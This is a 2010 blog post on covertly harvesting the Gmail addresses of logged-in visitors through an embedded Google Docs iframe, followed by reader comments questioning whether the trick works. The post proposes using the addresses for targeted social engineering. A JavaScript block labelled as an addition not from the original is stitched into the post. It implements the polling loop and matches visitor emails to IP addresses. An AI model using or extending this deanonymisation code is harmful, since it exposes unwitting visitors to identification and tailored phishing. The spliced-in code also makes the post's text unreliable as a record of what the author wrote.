
Harvesting email addresses surreptitiously - Arvind Narayanan's journal

Harvesting email addresses surreptitiously [Jan. 7th, 2010|08:42 pm]
Arvind Narayanan

I realized there's a simple way to harvest the Gmail address of anyone who visits your web page, assuming they're logged in to Google:

Embed an iframe on your page pointing to a world-readable document on Google Docs. In a separate backend process, poll the doc every few seconds (while logged in yourself) to retrieve the list of people currently viewing it. (This list is displayed in the Google Docs UI, so it has to be available somehow; I haven't yet figured out the appropriate URL to query, which probably involves executing a bunch of JavaScript.)

Have I missed anything? Is this widely known? I wonder if anyone's doing it.

Edit. I looked at a document in Firebug and the URLs are of the form
http://spreadsheets.google.com/fm/bind?hl=en&fmcmd=80&id=tFMKXV2J2J5xVFq9dRpRrfg.12613261761483303999.1726472472965475770&VER=6&lsq=1262925136228000&tfe=jc_78&gsessionid=eFoiXLiGEmA&RID=rpc&SID=D50CBF4594E07F04&CI=0&AID=24&TYPE=xmlhttp&zx=w6yldwukwptv&t=1
(That link has now expired; there's a session ID in there.)

The result seems to be a JSON list that encodes all the operations that need to be performed on the front-end. I presume this behavior is part of GWT (Google Web Toolkit). I've verified that email addresses are sent as part of the result of that query. Now all I need to figure out is how to construct that URL given a document. A simpler alternative would be to write a browser plugin. Anyone interested in helping me demonstrate this?

There are APIs that allow you to harvest a bunch of information about a person given their email address. I think the most powerful (malicious) use of this hack would be to identify a visitor within a few seconds, and exploit the fact that social engineering attacks are much more likely to succeed if you address the person by name and/or know some details about them.
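The backend half of the technique above, as an added example that is not code from the original post. The post never recovers the real bind URL, so the example assumes a hypothetical fetchViewers() that returns the document's current viewer list as an array of email strings, a web-server access log of visits to the attacker's page, and that a logged-in visitor shows up in the viewer list within a few seconds of the iframe loading. The sample visits and snapshots are constructed; the identification step is the time correlation between "someone hit my page" and "a new email appeared in the viewer list", which is what the polling loop has to do regardless of what the endpoint turns out to be.

```javascript
// Added example (not from the original post). Assumes a hypothetical
// fetchViewers() returning the current viewer emails for the embedded doc.

// Return which emails appeared and which disappeared between two polls.
function diffViewers(prev, next) {
  const before = new Set(prev);
  const after = new Set(next);
  return {
    joined: next.filter((e) => !before.has(e)),
    left: prev.filter((e) => !after.has(e)),
  };
}

// Walk a sequence of viewer-list snapshots ({t, viewers}) and a list of page
// visits ({t, ip}), both with millisecond timestamps. Each email that newly
// appears in a snapshot is attributed to the visits that occurred in the
// windowMs before that snapshot. Emails in `ignore` (your own session) are
// skipped. Returns a Map email -> array of candidate IPs (empty if no visit
// lines up, e.g. the viewer came from somewhere other than your page).
function correlate(snapshots, visits, windowMs, ignore = new Set()) {
  const attribution = new Map();
  let prev = [];
  for (const snap of snapshots) {
    const { joined } = diffViewers(prev, snap.viewers);
    for (const email of joined) {
      if (ignore.has(email) || attribution.has(email)) continue; // first sighting only
      const candidates = visits
        .filter((v) => v.t <= snap.t && snap.t - v.t <= windowMs)
        .map((v) => v.ip);
      attribution.set(email, candidates);
    }
    prev = snap.viewers;
  }
  return attribution;
}

// Polling loop built on the functions above; fetchViewers is hypothetical and
// must be supplied by the caller. Polls `polls` times, `intervalMs` apart, then
// correlates against the visit log using a window of two poll intervals.
async function pollLoop(fetchViewers, visits, intervalMs, polls, ignore) {
  const snapshots = [];
  for (let i = 0; i < polls; i++) {
    snapshots.push({ t: Date.now(), viewers: await fetchViewers() });
    await new Promise((r) => setTimeout(r, intervalMs));
  }
  return correlate(snapshots, visits, intervalMs * 2, ignore);
}

// Constructed sample data: the attacker's own session is always present; two
// visitors arrive three seconds apart and show up in the viewer list shortly
// after; a third visit at t=9000 produces no new viewer (not logged in).
const SAMPLE_VISITS = [
  { t: 1000, ip: "198.51.100.7" },
  { t: 4000, ip: "203.0.113.9" },
  { t: 9000, ip: "192.0.2.44" },
];
const SAMPLE_SNAPSHOTS = [
  { t: 0, viewers: ["attacker@example.com"] },
  { t: 2000, viewers: ["attacker@example.com", "alice@example.com"] },
  { t: 4000, viewers: ["attacker@example.com", "alice@example.com"] },
  { t: 6000, viewers: ["attacker@example.com", "bob@example.com"] },
  { t: 10000, viewers: ["attacker@example.com"] },
];

// Run the correlation over the constructed data with a 3 s window.
function demo() {
  return correlate(SAMPLE_SNAPSHOTS, SAMPLE_VISITS, 3000, new Set(["attacker@example.com"]));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [email, ips] of demo()) {
    console.log(email, "<-", ips.length ? ips.join(", ") : "(no matching visit)");
  }
}
```

With several visitors inside one window the attribution is a set of candidates rather than a single IP, which is why the poll interval matters: the shorter it is, the fewer visits fall into each window. Whether the viewer list is exposed to the document owner without any prompt to the visitor is exactly what the comments below dispute; the example assumes it is.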

Comments:
From: littlelotus79
2010-01-08 05:37 pm (UTC)
You just convinced me to not stay logged on to Google. Ever!
From: (Anonymous)
2010-01-08 07:13 pm (UTC)

Re: google

I only signed up to Google for the Google Docs system (if Yahoo had an integrated docs system I'd never have needed it), and even then I have hardly used it. I also have a Google email account and have hardly used that either, and this doesn't exactly encourage me to start using it again.
From: ext_220989
2010-01-08 07:28 pm (UTC)

mistaken presumption

"I presume this behavior is part of the GWT (Google Widget Toolkit)."

I'm pretty sure you are mistaken here. Google Docs does not appear to be a GWT app, and even if it were, the sort of thing you describe doesn't sound like anything I've ever seen in GWT.
From: arvindn
2010-01-08 07:56 pm (UTC)

Re: mistaken presumption

From: (Anonymous)
2010-01-08 09:06 pm (UTC)

funny...

You cannot actually "harvest" emails this way. If you do that embedding, the user visiting your page will get a warning saying that their email address is about to be grabbed and asking whether they want to proceed.

Telling people that part isn't so exciting though, is it?
From: arvindn
2010-01-08 09:13 pm (UTC)

Re: funny...

That made no sense at all.